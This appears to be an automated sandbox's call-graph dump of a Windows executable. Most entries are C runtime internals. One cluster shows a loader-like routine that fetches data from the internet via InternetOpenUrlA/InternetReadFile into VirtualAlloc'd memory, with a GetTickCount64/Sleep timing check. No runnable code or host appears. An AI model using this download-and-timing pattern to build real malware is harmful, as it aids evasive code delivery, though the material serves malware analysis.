FreeEnvironmentStringsW 21188->21191 21189->21188 21189->21189 21193 a163b8 __malloc_crt 66 API calls 21190->21193 21191->21192 21274 a1cdc8 21192->21274 21194 a1ceda 21193->21194 21194->21191 21195 a1cee2 WideCharToMultiByte 21194->21195 21196 a1cf00 FreeEnvironmentStringsW 21195->21196 21197 a1cef4 21195->21197 21196->21192 21198 a14452 _free 66 API calls 21197->21198 21199 a1cefc 21198->21199 21199->21196 21201 a1cb5b 21200->21201 21203 a1cb60 _strlen 21200->21203 21291 a1d6c7 21201->21291 21204 a163fd __calloc_crt 66 API calls 21203->21204 21208 a1cb6e 21203->21208 21205 a1cb95 _strlen 21204->21205 21206 a1cbe4 21205->21206 21205->21208 21209 a163fd __calloc_crt 66 API calls 21205->21209 21210 a1cc0a 21205->21210 21212 a18381 _strcpy_s 66 API calls 21205->21212 21213 a1cc21 21205->21213 21207 a14452 _free 66 API calls 21206->21207 21207->21208 21208->21152 21209->21205 21211 a14452 _free 66 API calls 21210->21211 21211->21208 21212->21205 21214 a1a8bb __invoke_watson 10 API calls 21213->21214 21216 a1cc2d 21214->21216 21218 a1ccba 21216->21218 21295 a244a2 21216->21295 21217 a1cdb8 21217->21152 21218->21217 21219 a244a2 76 API calls _parse_cmdline 21218->21219 21219->21218 21222 a1b40c __IsNonwritableInCurrentImage 21220->21222 21414 a191e5 21222->21414 21223 a1b42a __initterm_e 21224 a165ba __cinit 76 API calls 21223->21224 21225 a1b44b __IsNonwritableInCurrentImage 21223->21225 21224->21225 21225->21158 21227 a1cb01 21226->21227 21230 a1cb06 21226->21230 21228 a1d6c7 ___initmbctable 94 API calls 21227->21228 21228->21230 21229 a1cb42 21229->21164 21230->21229 21231 a244a2 _parse_cmdline 76 API calls 21230->21231 21231->21230 21417 a11186 21232->21417 21242 a159b9 21241->21242 21243 a159be 21241->21243 21245 a1c970 __FF_MSGBANNER 66 API calls 21242->21245 21244 a1c7c1 __NMSG_WRITE 66 API calls 21243->21244 21246 a159c6 21244->21246 21245->21243 21247 a1b37d _doexit 3 API calls 21246->21247 21248 a159d0 21247->21248 21248->21129 21250 a19902 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 21249->21250 21251 a198f9 21249->21251 21253 a1994c TlsAlloc 21250->21253 21913 a19632 21251->21913 21256 a1999a TlsSetValue 21253->21256 21258 a19a5b 21253->21258 21257 a199ab 21256->21257 21256->21258 21923 a1b3a7 21257->21923 21258->21132 21263 a199f3 DecodePointer 21266 a19a08 21263->21266 21264 a19a56 21265 a19632 __mtterm 70 API calls 21264->21265 21265->21258 21266->21264 21267 a163fd __calloc_crt 66 API calls 21266->21267 21268 a19a1e 21267->21268 21268->21264 21269 a19a26 DecodePointer 21268->21269 21270 a19a37 21269->21270 21270->21264 21271 a19a3b 21270->21271 21272 a1966f __getptd_noexit 66 API calls 21271->21272 21273 a19a43 GetCurrentThreadId 21272->21273 21273->21258 21275 a1cde2 GetModuleFileNameA 21274->21275 21276 a1cddd 21274->21276 21278 a1ce09 21275->21278 21277 a1d6c7 ___initmbctable 94 API calls 21276->21277 21277->21275 21934 a1cc2e 21278->21934 21280 a1ce65 21280->21146 21282 a163b8 __malloc_crt 66 API calls 21283 a1ce4b 21282->21283 21283->21280 21284 a1cc2e _parse_cmdline 76 API calls 21283->21284 21284->21280 21285 a1b5d5 21286 a1b495 _doexit 66 API calls 21285->21286 21287 a1b5e6 21286->21287 21287->21168 21289 a1b495 _doexit 66 API calls 21288->21289 21290 a1b60c 21289->21290 21290->21171 21292 a1d6d0 21291->21292 21293 a1d6d7 21291->21293 21298 a1d52d 21292->21298 21293->21203 21411 a2444f 21295->21411 21299 a1d539 __wsopen_helper 21298->21299 21300 a1979c __getptd 66 API calls 21299->21300 21301 a1d542 21300->21301 21302 a1d224 __setmbcp 68 API calls 21301->21302 21303 a1d54c 21302->21303 21329 a1d2c8 21303->21329 21306 a163b8 __malloc_crt 66 API calls 21307 a1d56d 21306->21307 21308 a1d68c __wsopen_helper 21307->21308 21336 a1d344 21307->21336 21308->21293 21311 a1d699 21311->21308 21315 a1d6ac 21311->21315 21317 a14452 _free 66 API calls 21311->21317 21312 a1d59d InterlockedDecrement 21313 a1d5ad 21312->21313 21314 a1d5be InterlockedIncrement 21312->21314 21313->21314 21319 a14452 _free 66 API calls 21313->21319 21314->21308 21316 a1d5d4 21314->21316 21318 a1a95f __fptostr 66 API calls 21315->21318 21316->21308 21321 a1b7b7 __lock 66 API calls 21316->21321 21317->21315 21318->21308 21320 a1d5bd 21319->21320 21320->21314 21323 a1d5e8 InterlockedDecrement 21321->21323 21324 a1d664 21323->21324 21325 a1d677 InterlockedIncrement 21323->21325 21324->21325 21327 a14452 _free 66 API calls 21324->21327 21346 a1d68e 21325->21346 21328 a1d676 21327->21328 21328->21325 21330 a15b6b _LocaleUpdate::_LocaleUpdate 76 API calls 21329->21330 21331 a1d2dc 21330->21331 21332 a1d305 21331->21332 21333 a1d2e7 GetOEMCP 21331->21333 21334 a1d30a GetACP 21332->21334 21335 a1d2f7 21332->21335 21333->21335 21334->21335 21335->21306 21335->21308 21337 a1d2c8 getSystemCP 78 API calls 21336->21337 21338 a1d364 21337->21338 21339 a1d36f setSBCS 21338->21339 21342 a1d3b3 IsValidCodePage 21338->21342 21344 a1d3d8 _memset __setmbcp_nolock 21338->21344 21340 a165d1 __atodbl_l 5 API calls 21339->21340 21341 a1d52b 21340->21341 21341->21311 21341->21312 21342->21339 21343 a1d3c5 GetCPInfo 21342->21343 21343->21339 21343->21344 21349 a1d094 GetCPInfo 21344->21349 21410 a1b6de LeaveCriticalSection 21346->21410 21348 a1d695 21348->21308 21350 a1d17c 21349->21350 21353 a1d0c8 _memset 21349->21353 21355 a165d1 __atodbl_l 5 API calls 21350->21355 21359 a1dbeb 21353->21359 21357 a1d222 21355->21357 21357->21344 21358 a15dd9 ___crtLCMapStringA 82 API calls 21358->21350 21360 a15b6b _LocaleUpdate::_LocaleUpdate 76 API calls 21359->21360 21361 a1dbfe 21360->21361 21369 a1db04 21361->21369 21364 a15dd9 21365 a15b6b _LocaleUpdate::_LocaleUpdate 76 API calls 21364->21365 21366 a15dec 21365->21366 21386 a15bf2 21366->21386 21370 a1db22 21369->21370 21371 a1db2d MultiByteToWideChar 21369->21371 21370->21371 21372 a1db56 21371->21372 21374 a1db5a 21371->21374 21373 a165d1 __atodbl_l 5 API calls 21372->21373 21375 a1d137 21373->21375 21376 a1db6f _memset __crtGetStringTypeA_stat 21374->21376 21377 a1729e _malloc 66 API calls 21374->21377 21375->21364 21376->21372 21378 a1dba8 MultiByteToWideChar 21376->21378 21377->21376 21379 a1dbcf 21378->21379 21380 a1dbbe GetStringTypeW 21378->21380 21382 a15b4b 21379->21382 21380->21379 21383 a15b68 21382->21383 21384 a15b57 21382->21384 21383->21372 21384->21383 21385 a14452 _free 66 API calls 21384->21385 21385->21383 21388 a15c10 MultiByteToWideChar 21386->21388 21389 a15c6e 21388->21389 21392 a15c75 21388->21392 21390 a165d1 __atodbl_l 5 API calls 21389->21390 21391 a15dd7 21390->21391 21391->21358 21396 a1729e _malloc 66 API calls 21392->21396 21400 a15c8e __crtGetStringTypeA_stat 21392->21400 21393 a15cc2 MultiByteToWideChar 21394 a15dba 21393->21394 21395 a15cdb LCMapStringW 21393->21395 21398 a15b4b __freea 66 API calls 21394->21398 21395->21394 21397 a15cfa 21395->21397 21396->21400 21399 a15d04 21397->21399 21403 a15d2d 21397->21403 21398->21389 21399->21394 21401 a15d18 LCMapStringW 21399->21401 21400->21389 21400->21393 21401->21394 21402 a15d7c LCMapStringW 21404 a15d92 WideCharToMultiByte 21402->21404 21405 a15db4 21402->21405 21406 a15d48 __crtGetStringTypeA_stat 21403->21406 21407 a1729e _malloc 66 API calls 21403->21407 21404->21405 21408 a15b4b __freea 66 API calls 21405->21408 21406->21394 21406->21402 21407->21406 21408->21394 21410->21348 21412 a15b6b _LocaleUpdate::_LocaleUpdate 76 API calls 21411->21412 21413 a24462 21412->21413 21413->21216 21415 a191eb EncodePointer 21414->21415 21415->21415 21416 a19205 21415->21416 21416->21223 21457 a141ba GetSystemTimeAsFileTime 21417->21457 21419 a11193 21459 a1434a 21419->21459 21421 a1435c 66 API calls _rand 21422 a11199 21421->21422 21422->21421 21423 a111de VirtualAlloc 21422->21423 21424 a12e55 21423->21424 21425 a12e5a __ftelli64_nolock __EH_prolog 21424->21425 21426 a12e69 InternetOpenA 21425->21426 21427 a12e87 InternetOpenUrlA 21426->21427 21428 a12f2d VirtualFree 21426->21428 21429 a12f24 InternetCloseHandle 21427->21429 21430 a12ea4 21427->21430 21440 a1168b 21428->21440 21429->21428 21462 a12d2b 21430->21462 21432 a12f0c InternetCloseHandle 21487 a12e19 21432->21487 21433 a12eea InternetReadFile 21435 a12eb8 21433->21435 21436 a12eff 21433->21436 21435->21432 21435->21433 21435->21436 21472 a125c0 21435->21472 21482 a12c92 21436->21482 21441 a11690 21440->21441 21443 a116ad 21441->21443 21449 a116f2 21441->21449 21836 a1437d 21441->21836 21444 a1437d _wprintf 104 API calls 21443->21444 21446 a116c2 21443->21446 21444->21443 21445 a1437d _wprintf 104 API calls 21445->21446 21446->21445 21447 a116da 21446->21447 21448 a1437d _wprintf 104 API calls 21447->21448 21447->21449 21448->21447 21450 a111e1 GetTickCount64 Sleep GetTickCount64 21449->21450 21889 a14424 21450->21889 21453 a1122c VirtualAlloc ReadFile CloseHandle 21456 a11283 21453->21456 21454 a14424 99 API calls 21454->21453 21456->21168 21456->21285 21458 a141ea __aulldiv 21457->21458 21458->21419 21460 a1979c __getptd 66 API calls 21459->21460 21461 a14354 21460->21461 21461->21422 21463 a12d30 __EH_prolog 21462->21463 21492 a12810 21463->21492 21467 a12d88 21499 a12480 21467->21499 21470 a12dc1 21470->21435 21473 a125c5 __EH_prolog 21472->21473 21748 a1221a 21473->21748 21477 a125ee 21756 a11c05 21477->21756 21480 a12677 21480->21433 21809 a12c49 21482->21809 21484 a12c9d 21485 a12cbf 21484->21485 21486 a1153b 67 API calls 21484->21486 21485->21432 21486->21485 21815 a12dd3 21487->21815 21493 a12815 __EH_prolog 21492->21493 21512 a12577 21493->21512 21496 a11fa0 21705 a11ce5 21496->21705 21498 a11fab 21498->21467 21501 a12485 __EH_prolog 21499->21501 21500 a124d8 21500->21470 21507 a1153b 21500->21507 21501->21500 21719 a1130b 21501->21719 21505 a124c7 21506 a110ee std::ios_base::_Ios_base_dtor 2 API calls 21505->21506 21506->21500 21508 a115bd 21507->21508 21511 a11551 21507->21511 21508->21470 21509 a1450c __CxxThrowException@8 RaiseException 21509->21511 21510 a13c83 std::exception::exception 66 API calls 21510->21511 21511->21509 21511->21510 21521 a11606 21512->21521 21517 a125ae 21518 a125ba 21517->21518 21536 a137c7 21517->21536 21518->21496 21519 a1153b 67 API calls 21519->21517 21522 a1153b 67 API calls 21521->21522 21523 a11639 21522->21523 21524 a1448c std::_Mutex::_Mutex 77 API calls 21523->21524 21525 a11640 21524->21525 21526 a1164c 21525->21526 21541 a110d4 21525->21541 21528 a12315 21526->21528 21529 a1231f __EH_prolog 21528->21529 21601 a11167 21529->21601 21537 a13149 std::_Lockit::_Lockit EnterCriticalSection 21536->21537 21538 a137d7 21537->21538 21539 a13171 int LeaveCriticalSection 21538->21539 21540 a1381a 21539->21540 21540->21518 21546 a13455 21541->21546 21543 a110dc std::locale::locale 21562 a1106a 21543->21562 21545 a110ea 21545->21526 21547 a13461 __EH_prolog3 21546->21547 21548 a134dc std::locale::_Locimp::~_Locimp 21547->21548 21567 a13149 21547->21567 21548->21543 21551 a1448c std::_Mutex::_Mutex 77 API calls 21553 a1348c 21551->21553 21554 a13499 21553->21554 21571 a133b2 21553->21571 21574 a1321a 21554->21574 21559 a134b9 21560 a1106a std::locale::facet::_Incref 2 API calls 21559->21560 21561 a134c6 21560->21561 21584 a13171 21561->21584 21563 a13149 std::_Lockit::_Lockit EnterCriticalSection 21562->21563 21564 a1107b 21563->21564 21565 a13171 int LeaveCriticalSection 21564->21565 21566 a1108f 21565->21566 21566->21545 21568 a1315b 21567->21568 21569 a13169 21567->21569 21588 a13b7e EnterCriticalSection 21568->21588 21569->21551 21569->21561 21572 a1330d _Yarn 66 API calls 21571->21572 21573 a133ea 21572->21573 21573->21554 21575 a13228 21574->21575 21577 a13239 21574->21577 21589 a13b9e 21575->21589 21578 a1330d 21577->21578 21579 a1331f 21578->21579 21583 a1334a _memmove 21578->21583 21580 a13329 21579->21580 21581 a14452 _free 66 API calls 21579->21581 21582 a1729e _malloc 66 API calls 21580->21582 21580->21583 21581->21580 21582->21583 21583->21559 21585 a13186 21584->21585 21586 a13178 21584->21586 21585->21548 21600 a13b8e LeaveCriticalSection 21586->21600 21588->21569 21590 a13bb2 EncodePointer 21589->21590 21591 a13bac 21589->21591 21590->21577 21592 a21ab6 _abort DecodePointer 21591->21592 21593 a18332 21592->21593 21594 a1833d 21593->21594 21596 a21ac3 _raise 67 API calls 21593->21596 21595 a18355 21594->21595 21597 a1a792 __call_reportfault 8 API calls 21594->21597 21598 a1b5eb _abort 66 API calls 21595->21598 21596->21594 21597->21595 21599 a1835f 21598->21599 21600->21585 21602 a1106a std::locale::facet::_Incref 2 API calls 21601->21602 21603 a1117f 21602->21603 21604 a11e2b 21603->21604 21605 a11e35 __EH_prolog 21604->21605 21606 a13149 std::_Lockit::_Lockit EnterCriticalSection 21605->21606 21607 a11e44 21606->21607 21626 a11035 21607->21626 21609 a11e5b 21611 a11e6e 21609->21611 21632 a11b82 21609->21632 21610 a13171 int LeaveCriticalSection 21612 a11ec3 21610->21612 21611->21610 21622 a110ee 21612->21622 21615 a11ea0 21616 a1106a std::locale::facet::_Incref 2 API calls 21615->21616 21619 a11eb0 21616->21619 21645 a1319d 21619->21645 21620 a1450c __CxxThrowException@8 RaiseException 21620->21615 21623 a110f9 21622->21623 21624 a110f4 21622->21624 21623->21517 21623->21519 21700 a11092 21624->21700 21627 a11041 21626->21627 21628 a11065 21626->21628 21629 a13149 std::_Lockit::_Lockit EnterCriticalSection 21627->21629 21628->21609 21630 a1104b 21629->21630 21631 a13171 int LeaveCriticalSection 21630->21631 21631->21628 21634 a11b8c __EH_prolog 21632->21634 21633 a11bf5 21633->21615 21642 a13cdf 21633->21642 21634->21633 21635 a1448c std::_Mutex::_Mutex 77 API calls 21634->21635 21636 a11ba7 21635->21636 21637 a11bdd 21636->21637 21648 a11a7e 21636->21648 21637->21633 21661 a11b03 21637->21661 21643 a13c83 std::exception::exception 66 API calls 21642->21643 21644 a11e92 21643->21644 21644->21620 21646 a1448c std::_Mutex::_Mutex 77 API calls 21645->21646 21647 a131a9 21646->21647 21647->21611 21649 a11a88 __EH_prolog 21648->21649 21650 a13149 std::_Lockit::_Lockit EnterCriticalSection 21649->21650 21651 a11a9a 21650->21651 21652 a11ae6 21651->21652 21653 a13c83 std::exception::exception 66 API calls 21651->21653 21675 a13365 21652->21675 21655 a11ad1 21653->21655 21657 a1450c __CxxThrowException@8 RaiseException 21655->21657 21657->21652 21658 a113e8 21684 a1308f 21658->21684 21660 a11408 21660->21637 21662 a11b0d __EH_prolog 21661->21662 21696 a132f2 21662->21696 21665 a11b2f 21667 a11b41 21665->21667 21668 a14452 _free 66 API calls 21665->21668 21666 a14452 _free 66 API calls 21666->21665 21669 a11b53 21667->21669 21670 a14452 _free 66 API calls 21667->21670 21668->21667 21671 a11b65 21669->21671 21673 a14452 _free 66 API calls 21669->21673 21670->21669 21672 a13171 int LeaveCriticalSection 21671->21672 21674 a11b75 21672->21674 21673->21671 21674->21633 21676 a1712a _setlocale 101 API calls 21675->21676 21677 a13373 21676->21677 21678 a1330d _Yarn 66 API calls 21677->21678 21679 a1338b 21678->21679 21680 a1339b 21679->21680 21681 a1712a _setlocale 101 API calls 21679->21681 21682 a1330d _Yarn 66 API calls 21680->21682 21681->21680 21683 a11aef 21682->21683 21683->21658 21685 a16392 ____lc_handle_func 74 API calls 21684->21685 21686 a1309a 21685->21686 21687 a1636c ____lc_codepage_func 74 API calls 21686->21687 21688 a130a7 21687->21688 21689 a163fd __calloc_crt 66 API calls 21688->21689 21690 a130b6 21689->21690 21691 a130bf 21690->21691 21692 a130de 21690->21692 21694 a15e1f ___pctype_func 74 API calls 21691->21694 21693 a15e1f ___pctype_func 74 API calls 21692->21693 21695 a130c9 _memmove 21693->21695 21694->21695 21695->21660 21697 a13301 21696->21697 21699 a11b21 21696->21699 21698 a1712a _setlocale 101 API calls 21697->21698 21698->21699 21699->21665 21699->21666 21701 a13149 std::_Lockit::_Lockit EnterCriticalSection 21700->21701 21702 a110a4 21701->21702 21703 a13171 int LeaveCriticalSection 21702->21703 21704 a110c7 21703->21704 21704->21623 21706 a11cef __EH_prolog 21705->21706 21713 a13a44 21706->21713 21709 a1448c std::_Mutex::_Mutex 77 API calls 21710 a11d0f 21709->21710 21711 a110d4 std::locale::locale 82 API calls 21710->21711 21712 a11d1b Mailbox 21710->21712 21711->21712 21712->21498 21714 a1448c std::_Mutex::_Mutex 77 API calls 21713->21714 21715 a13a50 21714->21715 21718 a13b5e InitializeCriticalSection 21715->21718 21717 a11d04 21717->21709 21718->21717 21720 a1106a std::locale::facet::_Incref 2 API calls 21719->21720 21721 a11323 21720->21721 21722 a1235c 21721->21722 21723 a12366 __EH_prolog 21722->21723 21724 a13149 std::_Lockit::_Lockit EnterCriticalSection 21723->21724 21725 a12375 21724->21725 21726 a11035 int 2 API calls 21725->21726 21728 a1238c 21726->21728 21727 a1239f 21729 a13171 int LeaveCriticalSection 21727->21729 21728->21727 21740 a11ed3 21728->21740 21730 a123f4 21729->21730 21730->21505 21733 a123d1 21735 a1106a std::locale::facet::_Incref 2 API calls 21733->21735 21734 a13cdf std::bad_exception::bad_exception 66 API calls 21736 a123c3 21734->21736 21737 a123e1 21735->21737 21738 a1450c __CxxThrowException@8 RaiseException 21736->21738 21739 a1319d std::locale::facet::_Facet_Register 77 API calls 21737->21739 21738->21733 21739->21727 21742 a11edd __EH_prolog 21740->21742 21741 a11f4d 21741->21733 21741->21734 21742->21741 21743 a1448c std::_Mutex::_Mutex 77 API calls 21742->21743 21745 a11ef9 21743->21745 21744 a11f23 21744->21741 21747 a11b03 102 API calls 21744->21747 21745->21744 21746 a11a7e 103 API calls 21745->21746 21746->21744 21747->21741 21750 a1221f __EH_prolog 21748->21750 21749 a12254 21749->21477 21752 a11848 21749->21752 21750->21749 21764 a11f67 21750->21764 21753 a11904 21752->21753 21754 a11861 _memmove 21752->21754 21753->21477 21754->21753 21768 a1297c 21754->21768 21757 a11c26 21756->21757 21758 a11c0e 21756->21758 21760 a124ed 21757->21760 21759 a1153b 67 API calls 21758->21759 21759->21757 21761 a124f2 __EH_prolog 21760->21761 21762 a12512 21761->21762 21805 a122da 21761->21805 21762->21480 21765 a11f79 21764->21765 21766 a11c05 67 API calls 21765->21766 21767 a11f9b 21766->21767 21767->21749 21769 a12981 Mailbox __EH_prolog 21768->21769 21770 a129f1 21769->21770 21771 a129dd 21769->21771 21774 a12990 Mailbox 21769->21774 21773 a1252a Mailbox 77 API calls 21770->21773 21780 a11fe2 21771->21780 21777 a12a0d 21773->21777 21774->21754 21775 a12aac 21775->21774 21776 a11fe2 _Fputc 99 API calls 21775->21776 21776->21774 21777->21774 21777->21775 21778 a1566a Mailbox 99 API calls 21777->21778 21779 a12420 Mailbox 77 API calls 21777->21779 21778->21777 21779->21777 21783 a14dc5 21780->21783 21784 a14dd1 __wsopen_helper 21783->21784 21785 a14de4 21784->21785 21786 a14dfc 21784->21786 21787 a1a95f __fptostr 66 API calls 21785->21787 21788 a150e4 __lock_file 67 API calls 21786->21788 21789 a14de9 21787->21789 21790 a14e02 21788->21790 21807 a122df __EH_prolog 21805->21807 21806 a12300 21806->21762 21807->21806 21808 a11f67 67 API calls 21807->21808 21808->21806 21810 a12c57 21809->21810 21813 a12c6a Mailbox 21809->21813 21811 a12872 Mailbox 110 API calls 21810->21811 21812 a12c5c 21811->21812 21814 a15902 __fcloseall 102 API calls 21812->21814 21813->21484 21814->21813 21816 a12ddd __EH_prolog 21815->21816 21823 a12cc1 21816->21823 21819 a1381c 21821 a1382b std::ios_base::_Tidy 21819->21821 21820 a13850 Mailbox 21821->21820 21822 a110ee std::ios_base::_Ios_base_dtor 2 API calls 21821->21822 21822->21820 21824 a12ccb Mailbox __EH_prolog 21823->21824 21825 a12cf4 21824->21825 21826 a12c49 Mailbox 113 API calls 21824->21826 21829 a11709 21825->21829 21826->21825 21828 a12cff 21828->21819 21830 a1171a 21829->21830 21832 a11721 Mailbox 21829->21832 21831 a110ee std::ios_base::_Ios_base_dtor 2 API calls 21830->21831 21831->21832 21835 a13b6e DeleteCriticalSection 21832->21835 21834 a13a6a Mailbox 21834->21828 21835->21834 21837 a14389 __wsopen_helper 21836->21837 21838 a14397 21837->21838 21839 a143ac __stbuf 21837->21839 21840 a1a95f __fptostr 66 API calls 21838->21840 21843 a15125 _flsall 67 API calls 21839->21843 21841 a1439c 21840->21841 21842 a1a90d __fptostr 11 API calls 21841->21842 21845 a143a7 __wsopen_helper 21842->21845 21844 a143be __stbuf 21843->21844 21853 a19a60 21844->21853 21845->21441 21847 a143d0 __stbuf 21860 a19bd7 21847->21860 21849 a143e8 __stbuf 21881 a19afc 21849->21881 21854 a1b0e3 __output_l 66 API calls 21853->21854 21855 a19a6f 21854->21855 21856 a223d6 __stbuf 66 API calls 21855->21856 21858 a19a75 __stbuf 21856->21858 21857 a19ac2 21857->21847 21858->21857 21859 a163b8 __malloc_crt 66 API calls 21858->21859 21859->21857 21861 a15b6b _LocaleUpdate::_LocaleUpdate 76 API calls 21860->21861 21862 a19c3e 21861->21862 21863 a19c42 21862->21863 21866 a1b0e3 __output_l 66 API calls 21862->21866 21879 a19c79 __output_l __aulldvrm _strlen 21862->21879 21864 a1a95f __fptostr 66 API calls 21863->21864 21865 a19c47 21864->21865 21867 a1a90d __fptostr 11 API calls 21865->21867 21866->21879 21868 a19c52 21867->21868 21869 a165d1 __atodbl_l 5 API calls 21868->21869 21870 a1a75e 21869->21870 21870->21849 21871 a2259e __isleadbyte_l 76 API calls 21871->21879 21872 a1a2ce DecodePointer 21872->21879 21873 a14452 _free 66 API calls 21873->21879 21874 a19b63 97 API calls _write_string 21874->21879 21875 a19b30 97 API calls __output_l 21875->21879 21876 a22581 78 API calls __cftof 21876->21879 21877 a163b8 __malloc_crt 66 API calls 21877->21879 21878 a1a337 DecodePointer 21878->21879 21879->21863 21879->21868 21879->21871 21879->21872 21879->21873 21879->21874 21879->21875 21879->21876 21879->21877 21879->21878 21880 a1a358 DecodePointer 21879->21880 21880->21879 21882 a19b07 21881->21882 21883 a143f9 21881->21883 21882->21883 21884 a151c2 __flush 97 API calls 21882->21884 21885 a14411 21883->21885 21884->21883 21886 a14416 __stbuf 21885->21886 21887 a15193 __getstream 2 API calls 21886->21887 21888 a14421 21887->21888 21888->21845 21892 a1ac24 21889->21892 21895 a1ab9f 21892->21895 21894 a11216 21894->21453 21894->21454 21896 a1abab __wsopen_helper __stbuf 21895->21896 21897 a1abc2 21896->21897 21898 a1abd7 21896->21898 21900 a1a95f __fptostr 66 API calls 21897->21900 21899 a150e4 __lock_file 67 API calls 21898->21899 21901 a1abdd 21899->21901 21902 a1abc7 21900->21902 21903 a19a60 __stbuf 66 API calls 21901->21903 21904 a1a90d __fptostr 11 API calls 21902->21904 21905 a1abe8 21903->21905 21907 a1abd2 __wsopen_helper 21904->21907 21906 a19afc __ftbuf 97 API calls 21905->21906 21908 a1ac01 21906->21908 21907->21894 21910 a1ac1c 21908->21910 21911 a15157 _fgetc 2 API calls 21910->21911 21912 a1ac22 21911->21912 21912->21907 21914 a1964b 21913->21914 21915 a1963c DecodePointer 21913->21915 21916 a1965c TlsFree 21914->21916 21917 a1966a 21914->21917 21915->21914 21916->21917 21918 a1b6a3 DeleteCriticalSection 21917->21918 21919 a1b6bb 21917->21919 21920 a14452 _free 66 API calls 21918->21920 21921 a1b6cd DeleteCriticalSection 21919->21921 21922 a198fe 21919->21922 21920->21917 21921->21919 21922->21132 21932 a195ec EncodePointer 21923->21932 21925 a1b3af __init_pointers __initp_misc_winsig 21933 a1ad1a EncodePointer 21925->21933 21927 a199b0 EncodePointer EncodePointer EncodePointer EncodePointer 21928 a1b63d 21927->21928 21929 a1b648 21928->21929 21930 a1b652 InitializeCriticalSectionAndSpinCount 21929->21930 21931 a199ef 21929->21931 21930->21929 21930->21931 21931->21263 21931->21264 21932->21925 21933->21927 21936 a1cc4d 21934->21936 21935 a244a2 _parse_cmdline 76 API calls 21935->21936 21936->21935 21938 a1ccba 21936->21938 21937 a1cdb8 21937->21280 21937->21282 21938->21937 21939 a244a2 76 API calls _parse_cmdline 21938->21939 21939->21938 19503 a13aa6 19505 a13ac5 19503->19505 19504 a13af1 19505->19504 19506 a13b0b 19505->19506 19508 a13a87 std::_Xfsopen 142 API calls 19505->19508 19511 a13b12 19506->19511 19513 a13a87 19506->19513 19508->19506 19511->19504 19516 a15902 19511->19516 19542 a1747d 19513->19542 19515 a13aa1 19515->19504 19529 a175c3 19515->19529 19517 a1590e __wsopen_helper 19516->19517 19518 a15920 19517->19518 19519 a15935 19517->19519 19520 a1a95f __fptostr 66 API calls 19518->19520 19527 a15930 __wsopen_helper 19519->19527 20744 a150e4 19519->20744 19521 a15925 19520->19521 19523 a1a90d __fptostr 11 API calls 19521->19523 19523->19527 19527->19504 19533 a175cf __wsopen_helper 19529->19533 19530 a175db 19531 a1a95f __fptostr 66 API calls 19530->19531 19534 a175e0 19531->19534 19532 a17601 19535 a150e4 __lock_file 67 API calls 19532->19535 19533->19530 19533->19532 19536 a1a90d __fptostr 11 API calls 19534->19536 19537 a17609 19535->19537 19540 a175eb __wsopen_helper 19536->19540 20813 a17539 19537->20813 19540->19511 19543 a17489 __wsopen_helper 19542->19543 19544 a1749c 19543->19544 19547 a174c9 19543->19547 19600 a1a95f 19544->19600 19561 a214e3 19547->19561 19550 a174ce 19551 a174e2 19550->19551 19552 a174d5 19550->19552 19554 a17509 19551->19554 19555 a174e9 19551->19555 19553 a1a95f __fptostr 66 API calls 19552->19553 19557 a174ac __wsopen_helper @_EH4_CallFilterFunc@8 19553->19557 19578 a2124c 19554->19578 19558 a1a95f __fptostr 66 API calls 19555->19558 19557->19515 19558->19557 19562 a214ef __wsopen_helper 19561->19562 19609 a1b7b7 19562->19609 19564 a21572 19616 a2160d 19564->19616 19565 a21579 19656 a163b8 19565->19656 19568 a21602 __wsopen_helper 19568->19550 19570 a2158e InitializeCriticalSectionAndSpinCount 19571 a215c1 EnterCriticalSection 19570->19571 19572 a215ae 19570->19572 19571->19564 19662 a14452 19572->19662 19576 a214fd 19576->19564 19576->19565 19619 a1b6f5 19576->19619 19646 a15125 19576->19646 19651 a15193 19576->19651 19579 a2126e 19578->19579 19580 a21282 19579->19580 19589 a21299 19579->19589 19581 a1a95f __fptostr 66 API calls 19580->19581 19582 a21287 19581->19582 19583 a1a90d __fptostr 11 API calls 19582->19583 19588 a17514 19583->19588 19584 a2148a 19587 a1a95f __fptostr 66 API calls 19584->19587 19585 a2149c 19833 a25135 19585->19833 19590 a2148f 19587->19590 19606 a1752f 19588->19606 19589->19584 19599 a21436 19589->19599 19836 a254bf 19589->19836 19591 a1a90d __fptostr 11 API calls 19590->19591 19591->19588 19593 a21405 19593->19584 19593->19593 19839 a25359 19593->19839 19596 a25359 __fassign 85 API calls 19597 a2144e 19596->19597 19598 a25359 __fassign 85 API calls 19597->19598 19597->19599 19598->19599 19599->19584 19599->19585 19601 a19723 __getptd_noexit 66 API calls 19600->19601 19602 a174a1 19601->19602 19603 a1a90d 19602->19603 20731 a1a8e0 DecodePointer 19603->20731 20737 a15157 19606->20737 19608 a17537 19608->19557 19610 a1b7cc 19609->19610 19611 a1b7df EnterCriticalSection 19609->19611 19612 a1b6f5 __mtinitlocknum 65 API calls 19610->19612 19611->19576 19613 a1b7d2 19612->19613 19613->19611 19668 a1b61f 19613->19668 19808 a1b6de LeaveCriticalSection 19616->19808 19618 a21614 19618->19568 19620 a1b701 __wsopen_helper 19619->19620 19621 a1b711 19620->19621 19622 a1b729 19620->19622 19623 a1c970 __FF_MSGBANNER 65 API calls 19621->19623 19624 a163b8 __malloc_crt 65 API calls 19622->19624 19630 a1b737 __wsopen_helper 19622->19630 19625 a1b716 19623->19625 19626 a1b742 19624->19626 19627 a1c7c1 __NMSG_WRITE 65 API calls 19625->19627 19628 a1b749 19626->19628 19629 a1b758 19626->19629 19631 a1b71d 19627->19631 19632 a1a95f __fptostr 65 API calls 19628->19632 19633 a1b7b7 __lock 65 API calls 19629->19633 19630->19576 19634 a1b37d _doexit 3 API calls 19631->19634 19632->19630 19635 a1b75f 19633->19635 19636 a1b727 19634->19636 19637 a1b792 19635->19637 19638 a1b767 InitializeCriticalSectionAndSpinCount 19635->19638 19636->19622 19639 a14452 _free 65 API calls 19637->19639 19640 a1b777 19638->19640 19641 a1b783 19638->19641 19639->19641 19642 a14452 _free 65 API calls 19640->19642 19809 a1b7ae 19641->19809 19644 a1b77d 19642->19644 19645 a1a95f __fptostr 65 API calls 19644->19645 19645->19641 19647 a15132 19646->19647 19648 a15148 EnterCriticalSection 19646->19648 19649 a1b7b7 __lock 66 API calls 19647->19649 19648->19576 19650 a1513b 19649->19650 19650->19576 19652 a151a3 19651->19652 19653 a151b6 LeaveCriticalSection 19651->19653 19813 a1b6de LeaveCriticalSection 19652->19813 19653->19576 19655 a151b3 19655->19576 19658 a163c1 19656->19658 19659 a163f7 19658->19659 19660 a163d8 Sleep 19658->19660 19814 a1729e 19658->19814 19659->19564 19659->19570 19661 a163ed 19660->19661 19661->19658 